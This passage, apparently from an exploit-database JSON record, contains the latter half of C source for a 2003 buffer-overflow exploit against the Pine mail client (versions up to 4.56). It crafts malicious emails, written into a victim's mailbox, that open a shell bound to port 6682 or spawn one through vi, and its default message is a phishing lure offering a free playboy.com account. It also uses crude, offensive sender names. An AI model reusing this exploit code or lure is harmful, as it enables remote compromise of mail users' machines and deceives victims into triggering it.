$2}' | tr -d '\\n'\"));\r\n\tprintf(\"Trying to own: %s\\n\",target.desc);\r\n\r\n\r\n\tpinerc();\r\n\r\n\t/* find stack dist from params -> eip */\r\n\tprintf(\"Searching stack distance\\n\");\r\n\tfor(target.dist = 4; target.dist < 1024; target.dist+=4) {\r\n\t\tprepare_mail(\"from\",\"subj\",\"to\");\r\n\t\town_easy(target.dist,testsc);\r\n\t\twrite_mail(\"/tmp/meil\");\r\n\t\tprintf(\"Testing target.dist %d\\r\",target.dist);\r\n\t\tfflush(stdout);\r\n\t\tif(test_dist())\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf(\"\\n\");\r\n\tif(target.dist == 1024)\r\n\t\tdie(1,\"Can't find dist\");\r\n\tprintf(\"DIST=%d\\n\\n\",target.dist);\r\n\r\n\tprintf(\"Ok theoretically we can exploit it the easy way\\n\"\r\n\t\t\"looking for hard way shit now\\n\\n\");\r\n\r\n\t/* find our buffer on bss ebp should b eip-4 */\t\r\n\ttarget.buff = findbuf(target.dist-4);\r\n\ttarget.method = 0;\r\n\tif(target.buff != -1) {\r\n\t\ttarget.method = 1;\r\n\t\tif(!isUsable(target.buff) || !isUsable(target.buff-PLIST))\r\n\t\t\tdie(0,\"TODO: addr not usuable... trivial to fix\");\r\n\t\tprintf(\"Our command will lie in 0x%.8x\\n\\n\",target.buff);\r\n\t\r\n\t\t/* find usable system() addr */\r\n\t\tprintf(\"Obtaining system() addr list\\n\");\r\n\t\tsysa = getSystemOffsets();\r\n\t\r\n\t\tfor(i = 0; i < 3; i++) {\r\n\t\t\tint usable = isUsable(sysa[i]);\r\n\t\t\tprintf(\"System %d:0x%.8x %s\\n\",i,sysa[i],\r\n\t\t\t\tusable?\"OK\":\"NOT OK\");\r\n\t\t\tif(usable)\r\n\t\t\t\ttarget.sys = sysa[i];\r\n\t\t}\r\n\t\tprintf(\"Will use 0x%.8x\\n\\n\",target.sys);\r\n\t}\r\n\telse\r\n\t\tprintf(\"Unable to do things the hard way =(\\n\");\r\n\r\n\tunlink(\"/tmp/pinerc\");\r\n\tunlink(\"/tmp/meil\");\r\n\r\n\tprintf(\"Summary of targets for this system:\\n\"\r\n\t\t\"{ \\\"%s\\\",0,%d,0,0},\\n\",target.desc,target.dist);\r\n\tif(target.method)\r\n\t\tprintf(\"{ \\\"%s\\\",1,%d,0x%.8x,0x%.8x}\\n\",\r\n\t\ttarget.desc,target.dist-4,target.buff,target.sys);\r\n\r\n\treturn target;\r\n}\r\n\r\n\r\n/* yeah kids luv this */\r\nvoid skriptkiddie_s0lar() {\r\n\tchar *mbox;\r\n\tFILE *f;\r\n\tstruct target_info target;\t\r\n\t\r\n\t\r\n\tprintf(\"O shit... is it s0lar running this exp again?\\n\"\r\n\"not even a -h? ok lets make her happy and make everyhing magically work\\n\"\r\n\t\t\"WARNING: need write axx on /tmp and use of gdb (no grsec high)\\n\\n\");\r\n\r\n\ttarget = getTarget();\r\n\r\n\r\n\t\r\n\tmbox = (char*)getenv(\"MAIL\");\r\n\tif(!mbox)\r\n\t\tdie(0,\"getenv()\");\r\n\t\t\r\n\tprintf(\"Attempting to write mails to %s\\n\",mbox);\r\n\tf = fopen(mbox,\"a\");\r\n\tif(!f)\r\n\t\tdie(1,\"fopen()\");\r\n\r\n\t/* first mail (easy) */\r\n\tprepare_mail(\"Andrei Koymaski <andrei gay ru>\",\r\n\t\"Easy method portbind 6682\",\"Gustavo Lamazza <gustavo gay it>\");\r\n\town_easy(target.dist,shellcode);\r\n\tif(fprintf(f,\"From sorbo Tue Nov 29 00:00:00 1983\\n%s\\n\",mail)<1)\r\n\t\tdie(1,\"fprintf()\");\r\n\r\n\r\n\t/* second mail (hard) \r\n\t * we run vi and then\r\n\t * :!/bin/sh\r\n\t * cuz we don't have enough space to make a bindshell and shit\r\n\t */\r\n\tif(target.method) {\r\n\t\tprepare_mail(\"Osama Bin Laden <osama al-quaeda ar>\",\r\n\"Hard method (owns grsec) portbind 6682 with vi... spawn shell from vi\",\r\n\t\t\t\"George Bush <george whitehouse gov>\");\r\n\t\town_hard(target.sys,target.buff-PLIST,target.buff,\r\n\t\t\ttarget.dist-4,\r\n\t\tlame_cmd);\r\n\r\n\tif(fprintf(f,\"From sorbo Tue Nov 29 00:00:00 1983\\n%s\\n\",mail)<1)\r\n\t\tdie(1,\"fprintf()\");\r\n\t}\r\n\t\r\n\tprintf(\"You should have mail... read with pine and see if this\"\r\n\t\t\" crap worx\\n\");\r\n\tprintf(\"Enjoy.... s0lar ti amo\\n\");\r\n\texit(0);\r\n\r\n}\r\n\r\n\r\nvoid listTargets() {\r\n\tint i;\r\n\t\r\n\tprintf( \"Id\\tDescription\\tMethod\\tDist\\tBuff\\t\\tsystem()\\n\"\r\n\"========================================================================\\n\");\r\n\tfor(i =0; i < sizeof(targets)/sizeof(struct target_info); i++) {\r\n\t\tprintf(\"%d\\t%s\\t%s\\t%d\\t0x%.8x\\t0x%.8x\\n\",\r\n\t\ti,targets[i].desc,targets[i].method?\"hard\":\"easy\", \r\n\t\ttargets[i].dist,targets[i].buff,targets[i].sys);\r\n\t}\r\n}\r\n\r\n/* own a target */\r\nvoid own(struct target_info t,char *from,char *sub,char *to) {\r\n\tprepare_mail(from,sub,to);\r\n\r\n\t/* hard */\r\n\tswitch(t.method) {\r\n\t\tcase 1: \r\n\t\t\town_hard(t.sys,t.buff-PLIST,t.buff,t.dist,lame_cmd);\r\n\t\t\tbreak;\r\n\t\r\n\t\tcase 0:\r\n\t\t\town_easy(t.dist,shellcode);\r\n\t\t\tbreak;\r\n\t\r\n\t\tdefault:\r\n\t\t\tdie(0,\"Unknown ownage method\");\t\r\n\t}\r\n\r\n\tprintf(\"%s\",mail);\r\n\r\n}\r\n\r\nvoid usage(char *m) {\r\n\tprintf(\"Usage: %s <opts>\\n\"\r\n\t\"-h\\tthis lame message\\n\"\r\n\t\"-f\\tfrom\\n\"\r\n\t\"-t\\tto\\n\"\r\n\t\"-s\\tsub\\n\"\r\n\t\"-o\\ttarget\\n\"\r\n\t\"-m\\tmethod 0:easy 1:hard(grsex)\\n\"\r\n\t\"-d\\tdist\\n\"\r\n\t\"-b\\tbuff\\n\"\r\n\t\"-l\\tsystem\\n\\n\"\r\n\t,m);\r\n\tlistTargets();\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\tchar from[512];\r\n\tchar to[512];\r\n\tchar sub[512];\r\n\tint opt;\r\n\tstruct target_info t;\r\n\tstruct target_info *target = &t;\t/* we shall own this */\r\n\r\n\tstrcpy(from,\"Justin Time <admin playboy com>\");\r\n\tstrcpy(to,\"You <winners playboy com>\");\r\n\tstrcpy(sub,\"You are selected! Come get your FREE playboy.com account\");\r\n\r\n\tt.method = -1;\r\n\tt.buff = 0;\r\n\tt.sys = 0;\r\n\tt.dist = 0;\r\n\r\n\tfprintf(stderr,\"(remote?) Pine <= 4.56 exploit \"\r\n\t\"by sorbo (sorbox yahoo com)\\np s grsec won't save you =(\\n\\n\");\r\n\r\n\tif(argc<2)\r\n\t\tskriptkiddie_s0lar();\r\n\t\t\r\n while( (opt = getopt(argc,argv,\"hf:t:s:o:m:d:b:l:\")) != -1) {\r\n \tswitch(opt) {\r\n \t\tdefault:\r\n \t\tcase 'h':\r\n \t\t\tusage(argv[0]);\r\n \t\t\texit(0);\r\n\r\n\t\t\tcase 'm':\r\n\t\t\t\tt.method = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'd':\r\n\t\t\t\tt.dist = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n \t\t\t\tif(sscanf(optarg,\"%x\",&t.buff) != 1)\r\n \t\t\t\t\tdie(0,\"Can't parse buff addr\");\r\n \t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n \t\t\t\tif(sscanf(optarg,\"%x\",&t.sys) != 1)\r\n \t\t\t\t\tdie(0,\"Can't parse sys addr\");\r\n \t\t\t\tbreak;\r\n\r\n \t\t\r\n \t\tcase 'f':\r\n \t\t\t/* does snprintf put the 0 at end if arg\r\n \t\t\t * barely fits ? i never really looked into\r\n \t\t\t * this... hope it does! ;D\r\n \t\t\t */\r\n \t\t\tsnprintf(from,sizeof(from),\"%s\",optarg);\r\n \t\t\tbreak;\r\n \t\tcase 't':\r\n \t\t\tsnprintf(to,sizeof(to),\"%s\",optarg);\r\n \t\t\tbreak;\r\n \t\tcase 's':\r\n \t\t\tsnprintf(sub,sizeof(sub),\"%s\",optarg);\r\n \t\t\tbreak;\r\n \t\tcase 'o': {\r\n \t\t\tunsigned int o = atoi(optarg);\r\n \t\t\tif(o >= \r\n \t\t\tsizeof(targets)/sizeof(struct target_info))\r\n \t\t\t\tdie(0,\"Target outta range\");\r\n \t\t\ttarget = &targets[o];\r\n \t\t\tbreak;\r\n \t\t}\r\n }\r\n } \r\n\t\r\n\t/* check if we got all we need */\r\n\tif(target == &t) {\r\n\t\tif(!t.dist)\r\n\t\t\tdie(0,\"provide dist\");\r\n\t\tif(t.method == 1) \r\n\t\t\tif(!t.buff || !t.sys)\r\n\t\t\t\tdie(0,\"buff or sys not provided\");\r\n\t}\r\n\t\r\n\t/* go for it */\r\n\town(*target,from,sub,to);\r\n exit(0);\t\r\n}\n\n// milw0rm.com [2003-09-16]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/99/"}]}